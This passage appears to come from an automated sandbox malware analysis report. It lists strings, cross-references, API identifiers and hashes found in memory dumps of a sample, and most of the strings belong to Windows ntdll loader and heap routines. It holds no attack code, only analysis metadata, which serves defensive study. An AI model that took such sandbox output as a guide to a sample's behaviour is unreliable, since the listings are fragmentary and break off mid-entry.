                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017F21BF
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 017F2180
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 017F2178
                                                              • RtlGetAssemblyStorageRoot, xrefs: 017F2160, 017F219A, 017F21BA
                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 017F219F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                              • API String ID: 0-861424205
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 017F8181, 017F81F5
                                                              • Loading import redirection DLL: '%wZ', xrefs: 017F8170
                                                              • LdrpInitializeImportRedirection, xrefs: 017F8177, 017F81EB
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017BC6C3
                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 017F81E5
                                                              • LdrpInitializeProcess, xrefs: 017BC6C4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-475462383
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                              • API String ID: 0-3393094623
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 017C2DF0: LdrInitializeThunk.NTDLL ref: 017C2DFA
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017C0BA3
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017C0BB6
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017C0D60
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017C0D74
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                              • String ID:
                                                              • API String ID: 1404860816-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                              • API String ID: 0-2518169356
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                              • API String ID: 0-3178619729
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 017E7D03
                                                              • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 017E7D56
                                                              • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 017E7D39
                                                              • SsHd, xrefs: 0179A885
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                              • API String ID: 0-2905229100
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                              • API String ID: 0-379654539
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017B8421
                                                              • @, xrefs: 017B8591
                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017B855E
                                                              • LdrpInitializeProcess, xrefs: 017B8422
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1918872054
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • HEAP: , xrefs: 017E54E0, 017E55A1
                                                              • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 017E55AE
                                                              • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 017E54ED
                                                              • HEAP[%wZ]: , xrefs: 017E54D1, 017E5592
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                              • API String ID: 0-1657114761
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • .Local, xrefs: 017B28D8
                                                              • SXS: %s() passed the empty activation context, xrefs: 017F21DE
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017F22B6
                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017F21D9, 017F22B1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                              • API String ID: 0-1239276146
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 017F3437
                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 017F342A
                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 017F3456
                                                              • RtlDeactivateActivationContext, xrefs: 017F3425, 017F3432, 017F3451
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                              • API String ID: 0-1245972979
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017E10AE
                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 017E1028
                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 017E0FE5
                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 017E106B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                              • API String ID: 0-1468400865
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 017EA992
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017EA9A2
                                                              • LdrpDynamicShimModule, xrefs: 017EA998
                                                              • apphelp.dll, xrefs: 017A2462
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-176724104
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • HEAP: , xrefs: 01793264
                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0179327D
                                                              • HEAP[%wZ]: , xrefs: 01793255
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                              • API String ID: 0-617086771
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                              • API String ID: 0-1670051934
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-4253913091
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • HEAP: , xrefs: 01781596
                                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01781728
                                                              • HEAP[%wZ]: , xrefs: 01781712
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                              • API String ID: 0-3178619729
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: $@
                                                              • API String ID: 2994545307-1077428164
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                              • API String ID: 0-2779062949
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • Failed to allocated memory for shimmed module list, xrefs: 017EA10F
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017EA121
                                                              • LdrpCheckModule, xrefs: 017EA117
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-161242083
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-1334570610
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 017F82DE
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017F82E8
                                                              • Failed to reallocate the system dirs string !, xrefs: 017F82D7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1783798831
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0183C1C5
                                                              • PreferredUILanguages, xrefs: 0183C212
                                                              • @, xrefs: 0183C1F1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                              • API String ID: 0-2968386058
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                              • API String ID: 0-1373925480
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01804888
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01804899
                                                              • LdrpCheckRedirection, xrefs: 0180488F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-3154609507
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-2558761708
                                                              • Opcode ID: df2fce1da61bc0003437c9f92a740795e321116e0635dc1b89433502d30ab144
                                                              • Instruction ID: da0180f3f02b05d7141cda7acaf707f3558ad7b2ca31a4e1eac9c9cd4a857564
                                                              • Opcode Fuzzy Hash: df2fce1da61bc0003437c9f92a740795e321116e0635dc1b89433502d30ab144
                                                              • Instruction Fuzzy Hash: 6E11007132410ADFDF29EA18D859F7AF3E8EF4561AF188169F406CB255DB30D844CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • LdrpInitializationFailure, xrefs: 018020FA
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01802104
                                                              • Process initialization failed with status 0x%08lx, xrefs: 018020F3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2986994758
                                                              • Opcode ID: 73d7002c2cefb4f6acffa430a223b5035d73256f001665049bbab53f8b4a5b0c
                                                              • Instruction ID: 527b4f2ced2dcf95cfacb0cd5fd21bbd23ff663190f419a25039a57a610c2cd5
                                                              • Opcode Fuzzy Hash: 73d7002c2cefb4f6acffa430a223b5035d73256f001665049bbab53f8b4a5b0c
                                                              • Instruction Fuzzy Hash: 14F0C875640309AFE765E64CCC5AF99B76DEB80B54F50006DFA40B72C5D6F0AB00CA92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: #%u
                                                              • API String ID: 48624451-232158463
                                                              • Opcode ID: b519b90107834242e6b8fcc80670d1bf1b86d35835ca6fe8503a20e71d07cf08
                                                              • Instruction ID: 05a8c66097b641cd0e1fa56e8fa6a6d99344c2c838caddeb3e8b27f710df4e62
                                                              • Opcode Fuzzy Hash: b519b90107834242e6b8fcc80670d1bf1b86d35835ca6fe8503a20e71d07cf08
                                                              • Instruction Fuzzy Hash: 7F715A71A0014A9FDF01DFA8D998FAEB7F8BF08744F144069E905E7255EA34EE45CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@
                                                              • API String ID: 0-149943524
                                                              • Opcode ID: 8703c35cb2a1abc39a50f4b0ca5d6a7fa2c554ee0e361b953ff6852b0a60535d
                                                              • Instruction ID: cefc6b9fc361c8de4914ca5b7fa2add6e95df5a9da4c12b592cf6edc20ddba45
                                                              • Opcode Fuzzy Hash: 8703c35cb2a1abc39a50f4b0ca5d6a7fa2c554ee0e361b953ff6852b0a60535d
                                                              • Instruction Fuzzy Hash: 2D328F705083218BDB25CF19D484B3EFBE1EF98B44F14491EFA959B2A0E734D948CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • LdrResSearchResource Enter, xrefs: 0178AA13
                                                              • LdrResSearchResource Exit, xrefs: 0178AA25
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                              • API String ID: 0-4066393604
                                                              • Opcode ID: 21572418c18fd13b5646abdd8f14b08a005b93104f75266bb76d444cc844353e
                                                              • Instruction ID: e96c524d8cdab7f1a93f678c9571c7de058b806ceaacd616d76840741257b4cb
                                                              • Opcode Fuzzy Hash: 21572418c18fd13b5646abdd8f14b08a005b93104f75266bb76d444cc844353e
                                                              • Instruction Fuzzy Hash: 2EE18E71A40209AFEF22DE99C984BAEFBFABF18310F10446AE901E7241E734D940CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `$`
                                                              • API String ID: 0-197956300
                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction ID: b9729dcb1d4d6edc40ef19415d358baa43517ff9bb162d0f29f8a45940a509cc
                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction Fuzzy Hash: 21C1F53124434A9BE728CF28C845B6BBBE5BFD4318F044A2DF696CB291DB75D605CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • ResIdCount less than 2., xrefs: 017DEEC9
                                                              • Failed to retrieve service checksum., xrefs: 017DEE56
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                              • API String ID: 0-863616075
                                                              • Opcode ID: 29b7e1c3b3e6487d7aa75bca9780e2ea2d88cdfdbb6cf2caacf44e896227f0a2
                                                              • Instruction ID: e4fe0d03f1774f77a40834b25b502f5116a0de572d846492d3c8b8421b1a7e6a
                                                              • Opcode Fuzzy Hash: 29b7e1c3b3e6487d7aa75bca9780e2ea2d88cdfdbb6cf2caacf44e896227f0a2
                                                              • Instruction Fuzzy Hash: AAE1F1B19087849FE325CF15C484BABFBE4BB88314F40892EE5999B380DB709949CF57
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: KlT$y:T
                                                              • API String ID: 0-3518590781
                                                              • Opcode ID: f96cae05c0121f8306d0504f36395478f1f6a2f9989950ac87176965e8c58f7b
                                                              • Instruction ID: bbca7eccb2ceb6d0b3d5320c22ed43091dea27bba1bdfe98b5830db06346a678
                                                              • Opcode Fuzzy Hash: f96cae05c0121f8306d0504f36395478f1f6a2f9989950ac87176965e8c58f7b
                                                              • Instruction Fuzzy Hash: 19D17572919B85CFD71ADF38D89AA503FB1F782720708438DCAA1934E2D7382526CF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Legacy$UEFI
                                                              • API String ID: 2994545307-634100481
                                                              • Opcode ID: 7e049a62be22ac9b8992a11a72df303c12cd041c145ed807fc51cdfeed449db5
                                                              • Instruction ID: 280add3c7af2532b889a700755552ae61230b4330359a750d8acc729c4e2da08
                                                              • Opcode Fuzzy Hash: 7e049a62be22ac9b8992a11a72df303c12cd041c145ed807fc51cdfeed449db5
                                                              • Instruction Fuzzy Hash: 08615B71E402199FDB24DFA8C844BAEFBB9FB48700F15406DE649EB361DB31A940CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
